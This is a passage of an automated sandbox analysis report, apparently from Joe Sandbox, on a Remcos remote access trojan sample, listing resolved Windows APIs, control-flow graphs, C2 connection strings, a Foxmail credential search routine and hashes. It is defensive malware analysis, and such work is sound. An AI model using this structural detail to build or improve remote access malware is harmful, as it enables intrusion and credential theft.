                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000), ref: 1234CCAA
                                                                                                                                                                                          • GetModuleHandleA.KERNEL32(ntdll,NtResumeProcess,?,?,?,?,1233E9E1), ref: 1234CCB7
                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000), ref: 1234CCBA
                                                                                                                                                                                          • LoadLibraryA.KERNEL32(Iphlpapi,GetExtendedTcpTable,?,?,?,?,1233E9E1), ref: 1234CCCC
                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000), ref: 1234CCCF
                                                                                                                                                                                          • LoadLibraryA.KERNEL32(Iphlpapi,GetExtendedUdpTable,?,?,?,?,1233E9E1), ref: 1234CCDC
                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000), ref: 1234CCDF
                                                                                                                                                                                          • GetModuleHandleA.KERNEL32(ntdll,NtQueryInformationProcess,?,?,?,?,1233E9E1), ref: 1234CCF0
                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000), ref: 1234CCF3
                                                                                                                                                                                          • GetModuleHandleA.KERNEL32(kernel32,GetFinalPathNameByHandleW,?,?,?,?,1233E9E1), ref: 1234CD04
                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000), ref: 1234CD07
                                                                                                                                                                                          • LoadLibraryA.KERNEL32(Rstrtmgr,RmStartSession,?,?,?,?,1233E9E1), ref: 1234CD19
                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000), ref: 1234CD1C
                                                                                                                                                                                          • LoadLibraryA.KERNEL32(Rstrtmgr,RmRegisterResources,?,?,?,?,1233E9E1), ref: 1234CD29
                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000), ref: 1234CD2C
                                                                                                                                                                                          • LoadLibraryA.KERNEL32(Rstrtmgr,RmGetList,?,?,?,?,1233E9E1), ref: 1234CD39
                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000), ref: 1234CD3C
                                                                                                                                                                                          • LoadLibraryA.KERNEL32(Rstrtmgr,RmEndSession,?,?,?,?,1233E9E1), ref: 1234CD49
                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000), ref: 1234CD4C
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000018.00000002.3664441036.0000000012330000.00000040.00001000.00020000.00000000.sdmp, Offset: 12330000, based on PE: true
                                                                                                                                                                                          • Associated: 00000018.00000002.3664441036.00000000123A4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000018.00000002.3664441036.00000000123A8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_24_2_12330000_wkrriuhD.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: AddressProc$LibraryLoad$HandleModule
                                                                                                                                                                                          • String ID: EnumDisplayDevicesW$EnumDisplayMonitors$GetComputerNameExW$GetConsoleWindow$GetExtendedTcpTable$GetExtendedUdpTable$GetFinalPathNameByHandleW$GetMonitorInfoW$GetProcessImageFileNameW$GetSystemTimes$GlobalMemoryStatusEx$Iphlpapi$IsUserAnAdmin$IsWow64Process$Kernel32$NtQueryInformationProcess$NtResumeProcess$NtSuspendProcess$NtUnmapViewOfSection$Psapi$RmEndSession$RmGetList$RmRegisterResources$RmStartSession$Rstrtmgr$SetProcessDEPPolicy$SetProcessDpiAwareness$Shell32$Shlwapi$kernel32$ntdll$shcore$user32
                                                                                                                                                                                          • API String ID: 4236061018-3687161714
                                                                                                                                                                                          • Opcode ID: 4baaf5c3e7387ac0a81ed403d25744b597e15e9d773a65eee2ef65b5a2fe4c9f
                                                                                                                                                                                          • Instruction ID: 7456489cc43484c5d3ec09f90c01bb797c769d8619827c0c59b8df52cfa4e2c2
                                                                                                                                                                                          • Opcode Fuzzy Hash: 4baaf5c3e7387ac0a81ed403d25744b597e15e9d773a65eee2ef65b5a2fe4c9f
                                                                                                                                                                                          • Instruction Fuzzy Hash: C3415BF6CC136C7AEE106BBA4C88D9B3F5CD98A3953428C27E149E7510DA389801CFA4
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 1233E9C5 Relevance: 53.3, APIs: 15, Strings: 15, Instructions: 795COMMON
                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                          • Executed
                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                          control_flow_graph 51 1233e9c5-1233ea47 call 1234cb50 GetModuleFileNameW call 1233f3c3 call 123320f6 * 2 call 1234be1b call 1233fb17 call 12331e8d call 1236fd00 68 1233ea93-1233eb5b call 12331e65 call 12331fab call 12331e65 call 1233531e call 12336383 call 12331fe2 call 12331fd8 * 2 call 12331e65 call 12331fc0 call 12335aa6 call 12331e65 call 123351e3 call 12331e65 call 123351e3 51->68 69 1233ea49-1233ea8e call 1233fbb3 call 12331e65 call 12331fab call 12340f37 call 1233fb64 call 1233f3b0 51->69 115 1233ebae-1233ebc9 call 12331e65 call 1233b9bd 68->115 116 1233eb5d-1233eba8 call 12336c1e call 12331fe2 call 12331fd8 call 12331fab call 12343549 68->116 95 1233eef2-1233ef03 call 12331fd8 69->95 125 1233ec03-1233ec0a call 1233d069 115->125 126 1233ebcb-1233ebea call 12331fab call 12343549 115->126 116->115 146 1233f34f-1233f36a call 12331fab call 123439a9 call 12342475 116->146 135 1233ec13-1233ec1a 125->135 136 1233ec0c-1233ec0e 125->136 126->125 145 1233ebec-1233ec02 call 12331fab call 123439a9 126->145 140 1233ec1e-1233ec2a call 1234b2c3 135->140 141 1233ec1c 135->141 139 1233eef1 136->139 139->95 151 1233ec33-1233ec37 140->151 152 1233ec2c-1233ec2e 140->152 141->140 145->125 172 1233f36f-1233f3a0 call 1234bc5e call 12331f04 call 12343a23 call 12331f09 * 2 146->172 154 1233ec76-1233ec89 call 12331e65 call 12331fab 151->154 155 1233ec39 call 12337716 151->155 152->151 173 1233ec90-1233ed18 call 12331e65 call 1234bc5e call 12331f13 call 12331f09 call 12331e65 call 12331fab call 12331e65 call 12331fab call 12331e65 call 12331fab call 12331e65 call 12331fab 154->173 174 1233ec8b call 12337755 154->174 163 1233ec3e-1233ec40 155->163 166 1233ec42-1233ec47 call 12337738 call 12337260 163->166 167 1233ec4c-1233ec5f call 12331e65 call 12331fab 163->167 166->167 167->154 187 1233ec61-1233ec67 167->187 203 1233f3a5-1233f3af call 1233dd42 call 12344f2a 172->203 223 1233ed80-1233ed84 173->223 224 1233ed1a-1233ed33 call 12331e65 call 12331fab call 1236bad6 173->224 174->173 187->154 191 1233ec69-1233ec6f 187->191 191->154 194 1233ec71 call 12337260 191->194 194->154 226 1233ef06-1233ef66 call 12366e90 call 1233247c call 12331fab * 2 call 123436f8 call 12339057 223->226 227 1233ed8a-1233ed91 223->227 224->223 250 1233ed35-1233ed7b call 12331e65 call 12331fab call 12331e65 call 12331fab call 1233da34 call 12331f13 call 12331f09 224->250 280 1233ef6b-1233efbf call 12331e65 call 12331fab call 12332093 call 12331fab call 1234376f call 12331e65 call 12331fab call 1236baac 226->280 229 1233ed93-1233ee0d call 12331e65 call 12331fab call 12331e65 call 12331fab call 12331e65 call 12331fab call 12331e65 call 12331fab call 12331e65 call 12331fab call 1233cdf9 227->229 230 1233ee0f-1233ee19 call 12339057 227->230 236 1233ee1e-1233ee42 call 1233247c call 12364798 229->236 230->236 258 1233ee51 236->258 259 1233ee44-1233ee4f call 12366e90 236->259 250->223 264 1233ee53-1233ee9e call 12331f04 call 1236f809 call 1233247c call 12331fab call 1233247c call 12331fab call 12343947 258->264 259->264 318 1233eea3-1233eec8 call 123647a1 call 12331e65 call 1233b9bd 264->318 333 1233efc1 280->333 334 1233efdc-1233efde 280->334 318->280 332 1233eece-1233eeed call 12331e65 call 1234bc5e call 1233f474 318->332 332->280 351 1233eeef 332->351 336 1233efc3-1233efda call 1234cd9b CreateThread 333->336 337 1233efe0-1233efe2 334->337 338 1233efe4 334->338 339 1233efea-1233f0c6 call 12332093 * 2 call 1234b4ef call 12331e65 call 12331fab call 12331e65 call 12331fab call 12331e65 call 12331fab call 1236baac call 12331e65 call 12331fab call 12331e65 call 12331fab call 12331e65 call 12331fab call 12331e65 call 12331fab StrToIntA call 12339de4 call 12331e65 call 12331fab 336->339 337->336 338->339 390 1233f101 339->390 391 1233f0c8-1233f0ff call 123644ea call 12331e65 call 12331fab CreateThread 339->391 351->139 392 1233f103-1233f11b call 12331e65 call 12331fab 390->392 391->392 403 1233f159-1233f16c call 12331e65 call 12331fab 392->403 404 1233f11d-1233f154 call 123644ea call 12331e65 call 12331fab CreateThread 392->404 413 1233f16e-1233f1c7 call 12331e65 call 12331fab call 12331e65 call 12331fab call 1233d9e8 call 12331f13 call 12331f09 CreateThread 403->413 414 1233f1cc-1233f1df call 12331e65 call 12331fab 403->414 404->403 413->414 425 1233f1e1-1233f215 call 12331e65 call 12331fab call 12331e65 call 12331fab call 1236baac call 1233c162 414->425 426 1233f21a-1233f23e call 1234b60d call 12331f13 call 12331f09 414->426 425->426 448 1233f243-1233f256 CreateThread 426->448 449 1233f240-1233f241 SetProcessDEPPolicy 426->449 452 1233f264-1233f26b 448->452 453 1233f258-1233f262 CreateThread 448->453 449->448 454 1233f279-1233f280 452->454 455 1233f26d-1233f277 CreateThread 452->455 453->452 459 1233f282-1233f285 454->459 460 1233f28e 454->460 455->454 461 1233f287-1233f28c 459->461 462 1233f2cc-1233f2df call 12331fab call 123434ff 459->462 463 1233f293-1233f2c7 call 12332093 call 123352fd call 12332093 call 1234b4ef call 12331fd8 460->463 461->463 471 1233f2e4-1233f2e7 462->471 463->462 471->203 473 1233f2ed-1233f32d call 1234bc5e call 12331f04 call 1234361b call 12331f09 call 12331f04 471->473 489 1233f346-1233f34b DeleteFileW 473->489 490 1233f32f-1233f332 489->490 491 1233f34d 489->491 490->172 492 1233f334-1233f341 Sleep call 12331f04 490->492 491->172 492->489
                                                                                                                                                                                          APIs
                                                                                                                                                                                            • Part of subcall function 1234CB50: LoadLibraryA.KERNEL32(Psapi,GetProcessImageFileNameW,?,?,?,?,1233E9E1), ref: 1234CB65
                                                                                                                                                                                            • Part of subcall function 1234CB50: GetProcAddress.KERNEL32(00000000), ref: 1234CB6E
                                                                                                                                                                                            • Part of subcall function 1234CB50: GetModuleHandleA.KERNEL32(Kernel32,GetProcessImageFileNameW,?,?,?,?,1233E9E1), ref: 1234CB85
                                                                                                                                                                                            • Part of subcall function 1234CB50: GetProcAddress.KERNEL32(00000000), ref: 1234CB88
                                                                                                                                                                                            • Part of subcall function 1234CB50: LoadLibraryA.KERNEL32(shcore,SetProcessDpiAwareness,?,?,?,?,1233E9E1), ref: 1234CB9A
                                                                                                                                                                                            • Part of subcall function 1234CB50: GetProcAddress.KERNEL32(00000000), ref: 1234CB9D
                                                                                                                                                                                            • Part of subcall function 1234CB50: LoadLibraryA.KERNEL32(user32,SetProcessDpiAwareness,?,?,?,?,1233E9E1), ref: 1234CBAE
                                                                                                                                                                                            • Part of subcall function 1234CB50: GetProcAddress.KERNEL32(00000000), ref: 1234CBB1
                                                                                                                                                                                            • Part of subcall function 1234CB50: LoadLibraryA.KERNEL32(ntdll,NtUnmapViewOfSection,?,?,?,?,1233E9E1), ref: 1234CBC3
                                                                                                                                                                                            • Part of subcall function 1234CB50: GetProcAddress.KERNEL32(00000000), ref: 1234CBC6
                                                                                                                                                                                            • Part of subcall function 1234CB50: LoadLibraryA.KERNEL32(kernel32,GlobalMemoryStatusEx,?,?,?,?,1233E9E1), ref: 1234CBD2
                                                                                                                                                                                            • Part of subcall function 1234CB50: GetProcAddress.KERNEL32(00000000), ref: 1234CBD5
                                                                                                                                                                                            • Part of subcall function 1234CB50: GetModuleHandleA.KERNEL32(kernel32,IsWow64Process,?,?,?,?,1233E9E1), ref: 1234CBE6
                                                                                                                                                                                            • Part of subcall function 1234CB50: GetProcAddress.KERNEL32(00000000), ref: 1234CBE9
                                                                                                                                                                                            • Part of subcall function 1234CB50: GetModuleHandleA.KERNEL32(kernel32,GetComputerNameExW,?,?,?,?,1233E9E1), ref: 1234CBFA
                                                                                                                                                                                            • Part of subcall function 1234CB50: GetProcAddress.KERNEL32(00000000), ref: 1234CBFD
                                                                                                                                                                                            • Part of subcall function 1234CB50: LoadLibraryA.KERNEL32(Shell32,IsUserAnAdmin,?,?,?,?,1233E9E1), ref: 1234CC0E
                                                                                                                                                                                            • Part of subcall function 1234CB50: GetProcAddress.KERNEL32(00000000), ref: 1234CC11
                                                                                                                                                                                            • Part of subcall function 1234CB50: GetModuleHandleA.KERNEL32(kernel32,SetProcessDEPPolicy,?,?,?,?,1233E9E1), ref: 1234CC22
                                                                                                                                                                                            • Part of subcall function 1234CB50: GetProcAddress.KERNEL32(00000000), ref: 1234CC25
                                                                                                                                                                                            • Part of subcall function 1234CB50: GetModuleHandleA.KERNEL32(user32,EnumDisplayDevicesW,?,?,?,?,1233E9E1), ref: 1234CC36
                                                                                                                                                                                            • Part of subcall function 1234CB50: GetProcAddress.KERNEL32(00000000), ref: 1234CC39
                                                                                                                                                                                            • Part of subcall function 1234CB50: GetModuleHandleA.KERNEL32(user32,EnumDisplayMonitors,?,?,?,?,1233E9E1), ref: 1234CC4A
                                                                                                                                                                                            • Part of subcall function 1234CB50: GetProcAddress.KERNEL32(00000000), ref: 1234CC4D
                                                                                                                                                                                            • Part of subcall function 1234CB50: GetModuleHandleA.KERNEL32(user32,GetMonitorInfoW,?,?,?,?,1233E9E1), ref: 1234CC5E
                                                                                                                                                                                            • Part of subcall function 1234CB50: GetProcAddress.KERNEL32(00000000), ref: 1234CC61
                                                                                                                                                                                            • Part of subcall function 1234CB50: GetModuleHandleA.KERNEL32(kernel32,GetSystemTimes,?,?,?,?,1233E9E1), ref: 1234CC72
                                                                                                                                                                                            • Part of subcall function 1234CB50: GetProcAddress.KERNEL32(00000000), ref: 1234CC75
                                                                                                                                                                                            • Part of subcall function 1234CB50: LoadLibraryA.KERNEL32(Shlwapi,0000000C,?,?,?,?,1233E9E1), ref: 1234CC83
                                                                                                                                                                                          • GetModuleFileNameW.KERNEL32(00000000,C:\Users\Public\Libraries\wkrriuhD.pif,00000104), ref: 1233E9EE
                                                                                                                                                                                            • Part of subcall function 12340F37: __EH_prolog.LIBCMT ref: 12340F3C
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000018.00000002.3664441036.0000000012330000.00000040.00001000.00020000.00000000.sdmp, Offset: 12330000, based on PE: true
                                                                                                                                                                                          • Associated: 00000018.00000002.3664441036.00000000123A4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000018.00000002.3664441036.00000000123A8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_24_2_12330000_wkrriuhD.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: AddressProc$Module$Handle$LibraryLoad$FileH_prologName
                                                                                                                                                                                          • String ID: Access Level: $Administrator$C:\Users\Public\Libraries\wkrriuhD.pif$Exe$Exe$Inj$Remcos Agent initialized$Rmc-W5UGP5$Software\$User$del$del$exepath$licence$license_code.txt
                                                                                                                                                                                          • API String ID: 2830904901-2597219987
                                                                                                                                                                                          • Opcode ID: 532d45cd05ab86e21cd817842afe67e6c3263e9215f9a04fe4d1eed608f8d8a3
                                                                                                                                                                                          • Instruction ID: d3542d3a77953847e0b47a20ef9dca4d4ba795965cb8dade0f268c5e83b73a44
                                                                                                                                                                                          • Opcode Fuzzy Hash: 532d45cd05ab86e21cd817842afe67e6c3263e9215f9a04fe4d1eed608f8d8a3
                                                                                                                                                                                          • Instruction Fuzzy Hash: 34321B6BB543402FDABBA7709C65B7E26E94FC1B42F90092DE482DB1C0DE65AF01C761
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 12344F2A Relevance: 35.8, APIs: 5, Strings: 15, Instructions: 809sleepnetworkCOMMON
                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                          • Executed
                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                          control_flow_graph 494 12344f2a-12344f72 call 123320df call 1234b8b3 call 123320df call 12331e65 call 12331fab call 1236baac 507 12344f74-12344f7b Sleep 494->507 508 12344f81-12344fcd call 12332093 call 12331e65 call 123320f6 call 1234be1b call 1233489e call 12331e65 call 1233b9bd 494->508 507->508 523 12345041-123450dc call 12332093 call 12331e65 call 123320f6 call 1234be1b call 12331e65 * 2 call 12336c1e call 12332f10 call 12331fe2 call 12331fd8 * 2 call 12331e65 call 12335b05 508->523 524 12344fcf-1234503e call 12331e65 call 1233247c call 12331e65 call 12331fab call 12331e65 call 1233247c call 12331e65 call 12331fab call 12331e65 call 1233247c call 12331e65 call 12331fab call 1233473d 508->524 577 123450ec-123450f3 523->577 578 123450de-123450ea 523->578 524->523 579 123450f8-1234518a call 12335aa6 call 1233531e call 12336383 call 12332f10 call 12332093 call 1234b4ef call 12331fd8 * 2 call 12331e65 call 12331fab call 12331e65 call 12331fab call 12344ee9 577->579 578->579 606 123451d5-123451e3 call 1233482d 579->606 607 1234518c-123451d0 WSAGetLastError call 1234cae1 call 123352fd call 12332093 call 1234b4ef call 12331fd8 579->607 613 123451e5-1234520b call 12332093 * 2 call 1234b4ef 606->613 614 12345210-12345225 call 12334f51 call 123348c8 606->614 629 12345aa3-12345ab5 call 12334e26 call 123321fa 607->629 613->629 614->629 630 1234522b-1234537e call 12331e65 * 2 call 1233531e call 12336383 call 12332f10 call 12336383 call 12332f10 call 12332093 call 1234b4ef call 12331fd8 * 4 call 1234b7e0 call 123445bd call 1233905c call 12371e81 call 12331e65 call 123320f6 call 1233247c call 12331fab * 2 call 123436f8 614->630 643 12345ab7-12345ad7 call 12331e65 call 12331fab call 1236baac Sleep 629->643 644 12345add-12345ae5 call 12331e8d 629->644 694 12345380-1234538d call 12335aa6 630->694 695 12345392-123453b9 call 12331fab call 123435a6 630->695 643->644 644->523 694->695 701 123453c0-12345a0a call 1233417e call 1233dd89 call 1234bc42 call 1234bd1e call 1234bb8e call 12331e65 GetTickCount call 1234bb8e call 1234bae6 call 1234bb8e * 2 call 1234ba96 call 1234bd1e * 5 call 1233f8d1 call 1234bd1e call 12332f31 call 12332ea1 call 12332f10 call 12332ea1 call 12332f10 * 3 call 12332ea1 call 12332f10 call 12336383 call 12332f10 call 12336383 call 12332f10 call 12332ea1 call 12332f10 call 12332ea1 call 12332f10 call 12332ea1 call 12332f10 call 12332ea1 call 12332f10 call 12332ea1 call 12332f10 call 12332ea1 call 12332f10 call 12332ea1 call 12332f10 call 12336383 call 12332f10 * 5 call 12332ea1 call 12332f10 call 12332ea1 call 12332f10 * 7 call 12332ea1 call 12334aa1 call 12331fd8 * 50 call 12331f09 call 12331fd8 * 6 call 12331f09 call 12334c10 695->701 702 123453bb-123453bd 695->702 947 12345a0f-12345a16 701->947 702->701 948 12345a18-12345a1f 947->948 949 12345a2a-12345a31 947->949 948->949 950 12345a21-12345a23 948->950 951 12345a33-12345a38 call 1233b051 949->951 952 12345a3d-12345a6f call 12335a6b call 12332093 * 2 call 1234b4ef 949->952 950->949 951->952 963 12345a71-12345a7d CreateThread 952->963 964 12345a83-12345a9e call 12331fd8 * 2 call 12331f09 952->964 963->964 964->629
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • Sleep.KERNEL32(00000000,00000029,123A52F0,123A50E4,00000000), ref: 12344F7B
                                                                                                                                                                                          • WSAGetLastError.WS2_32(00000000,00000001), ref: 1234518C
                                                                                                                                                                                          • Sleep.KERNEL32(00000000,00000002), ref: 12345AD7
                                                                                                                                                                                            • Part of subcall function 1234B4EF: GetLocalTime.KERNEL32(00000000), ref: 1234B509
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000018.00000002.3664441036.0000000012330000.00000040.00001000.00020000.00000000.sdmp, Offset: 12330000, based on PE: true
                                                                                                                                                                                          • Associated: 00000018.00000002.3664441036.00000000123A4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000018.00000002.3664441036.00000000123A8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_24_2_12330000_wkrriuhD.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Sleep$ErrorLastLocalTime
                                                                                                                                                                                          • String ID: | $%I64u$4.9.4 Pro$C:\Users\Public\Libraries\wkrriuhD.pif$Connected | $Connecting | $Connection Error: $Connection Error: Unable to create socket$Disconnected$Exe$Rmc-W5UGP5$TLS Off$TLS On $hlight$name
                                                                                                                                                                                          • API String ID: 524882891-2597379952
                                                                                                                                                                                          • Opcode ID: 273b4899063cd84ef6acc3986f5c622b8eee39aeb6a718b29788de49df5eb436
                                                                                                                                                                                          • Instruction ID: 05f54124d78cf9ab05fd714021012dd6a1a2eda3484bd20dbe95fdd5c2c57b3e
                                                                                                                                                                                          • Opcode Fuzzy Hash: 273b4899063cd84ef6acc3986f5c622b8eee39aeb6a718b29788de49df5eb436
                                                                                                                                                                                          • Instruction Fuzzy Hash: 65523C3BA002145BDB6AE731DC91AFEB3B59F50302F6046A9D40AA61E4EF307F49CB51
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 146412EE Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 243stringCOMMON
                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • GetEnvironmentVariableW.KERNEL32(ProgramFiles,?,00000104), ref: 14641434
                                                                                                                                                                                            • Part of subcall function 146410F1: lstrlenW.KERNEL32(?,?,?,?,00000002,00000000), ref: 14641137
                                                                                                                                                                                            • Part of subcall function 146410F1: lstrcatW.KERNEL32(?,?), ref: 14641151
                                                                                                                                                                                            • Part of subcall function 146410F1: lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 1464115C
                                                                                                                                                                                            • Part of subcall function 146410F1: lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 1464116D
                                                                                                                                                                                            • Part of subcall function 146410F1: lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 1464117C
                                                                                                                                                                                            • Part of subcall function 146410F1: FindFirstFileW.KERNEL32(?,?,?,?,?,?,?,?,00000002,00000000), ref: 14641193
                                                                                                                                                                                            • Part of subcall function 146410F1: FindNextFileW.KERNELBASE(00000000,00000010), ref: 146411D0
                                                                                                                                                                                            • Part of subcall function 146410F1: FindClose.KERNEL32(00000000), ref: 146411DB
                                                                                                                                                                                          • lstrlenW.KERNEL32(?), ref: 146414C5
                                                                                                                                                                                          • lstrlenW.KERNEL32(?), ref: 146414E0
                                                                                                                                                                                          • lstrlenW.KERNEL32(?,?), ref: 1464150F
                                                                                                                                                                                          • lstrcatW.KERNEL32(00000000), ref: 14641521
                                                                                                                                                                                          • lstrlenW.KERNEL32(?,?), ref: 14641547
                                                                                                                                                                                          • lstrcatW.KERNEL32(00000000), ref: 14641553
                                                                                                                                                                                          • lstrlenW.KERNEL32(?,?), ref: 14641579
                                                                                                                                                                                          • lstrcatW.KERNEL32(00000000), ref: 14641585
                                                                                                                                                                                          • lstrlenW.KERNEL32(?,?), ref: 146415AB
                                                                                                                                                                                          • lstrcatW.KERNEL32(00000000), ref: 146415B7
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000018.00000002.3665605507.0000000014641000.00000040.00001000.00020000.00000000.sdmp, Offset: 14640000, based on PE: true
                                                                                                                                                                                          • Associated: 00000018.00000002.3665584194.0000000014640000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000018.00000002.3665605507.0000000014656000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_24_2_14640000_wkrriuhD.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: lstrlen$lstrcat$Find$File$CloseEnvironmentFirstNextVariable
                                                                                                                                                                                          • String ID: )$Foxmail$ProgramFiles
                                                                                                                                                                                          • API String ID: 672098462-2938083778
                                                                                                                                                                                          • Opcode ID: 815d51095885201ce6321a561dd3b7f1f5faaa881f8a3e58b7ffaca124c31345
                                                                                                                                                                                          • Instruction ID: 4c34dc5330490b30a1996495ec49b4bce4ed29a3a5b05c81d1c187b68eaf6484
                                                                                                                                                                                          • Opcode Fuzzy Hash: 815d51095885201ce6321a561dd3b7f1f5faaa881f8a3e58b7ffaca124c31345
                                                                                                                                                                                          • Instruction Fuzzy Hash: 9B81E675A00368AAEF20DBA0DC49FDF7739EF44744F140596F508EB190EAB15A84CF98
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 123348C8 Relevance: 19.4, APIs: 4, Strings: 7, Instructions: 144networkCOMMON
                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • connect.WS2_32(FFFFFFFF,124892B8,00000010), ref: 123348E0
                                                                                                                                                                                          • CreateEventW.KERNEL32(00000000,00000000,00000001,00000000), ref: 12334A00
                                                                                                                                                                                          • CreateEventW.KERNEL32(00000000,00000000,00000001,00000000), ref: 12334A0E
                                                                                                                                                                                          • WSAGetLastError.WS2_32 ref: 12334A21
                                                                                                                                                                                            • Part of subcall function 1234B4EF: GetLocalTime.KERNEL32(00000000), ref: 1234B509
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000018.00000002.3664441036.0000000012330000.00000040.00001000.00020000.00000000.sdmp, Offset: 12330000, based on PE: true
                                                                                                                                                                                          • Associated: 00000018.00000002.3664441036.00000000123A4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000018.00000002.3664441036.00000000123A8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_24_2_12330000_wkrriuhD.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: CreateEvent$ErrorLastLocalTimeconnect
                                                                                                                                                                                          • String ID: Connection Failed: $Connection Refused$TLS Authentication Failed$TLS Error 1$TLS Error 2$TLS Error 3$TLS Handshake... |
                                                                                                                                                                                          • API String ID: 994465650-2151626615
                                                                                                                                                                                          • Opcode ID: 090fa5f297dbacd48fc960daf6604c05599e1c2859d11396530a686f6f986cce
                                                                                                                                                                                          • Instruction ID: 1df8e58442a5ea6dde0084a49e1a2fb6a8a09e629227ec4bfe55ddefe7941de7
                                                                                                                                                                                          • Opcode Fuzzy Hash: 090fa5f297dbacd48fc960daf6604c05599e1c2859d11396530a686f6f986cce
                                                                                                                                                                                          • Instruction Fuzzy Hash: 57418E7FB00206ABEB66777ACC4597DBB5AEB42311B804218D50347695EE21FE14C7E3
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 12334E26 Relevance: 18.1, APIs: 12, Instructions: 65synchronizationCOMMON
                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • WaitForSingleObject.KERNEL32(00000000,000000FF,00000000,123A4EF8,?,00000000,123A4EF8,12334CA8,00000000,00000000,00000000,?,123A4EF8,?), ref: 12334E38
                                                                                                                                                                                          • SetEvent.KERNEL32(00000000,?,00000000,123A4EF8,12334CA8,00000000,00000000,00000000,?,123A4EF8,?), ref: 12334E43
                                                                                                                                                                                          • FindCloseChangeNotification.KERNEL32(00000000,?,00000000,123A4EF8,12334CA8,00000000,00000000,00000000,?,123A4EF8,?), ref: 12334E4C
                                                                                                                                                                                          • closesocket.WS2_32(FFFFFFFF), ref: 12334E5A
                                                                                                                                                                                          • WaitForSingleObject.KERNEL32(00000000,000000FF,?,00000000,123A4EF8,12334CA8,00000000,00000000,00000000,?,123A4EF8,?), ref: 12334E91
                                                                                                                                                                                          • SetEvent.KERNEL32(00000000,?,00000000,123A4EF8,12334CA8,00000000,00000000,00000000,?,123A4EF8,?), ref: 12334EA2
                                                                                                                                                                                          • WaitForSingleObject.KERNEL32(00000000,000000FF,?,00000000,123A4EF8,12334CA8,00000000,00000000,00000000,?,123A4EF8,?), ref: 12334EA9
                                                                                                                                                                                          • SetEvent.KERNEL32(00000000,?,00000000,123A4EF8,12334CA8,00000000,00000000,00000000,?,123A4EF8,?), ref: 12334EBA
                                                                                                                                                                                          • CloseHandle.KERNEL32(00000000,?,00000000,123A4EF8,12334CA8,00000000,00000000,00000000,?,123A4EF8,?), ref: 12334EBF
                                                                                                                                                                                          • CloseHandle.KERNEL32(00000000,?,00000000,123A4EF8,12334CA8,00000000,00000000,00000000,?,123A4EF8,?), ref: 12334EC4
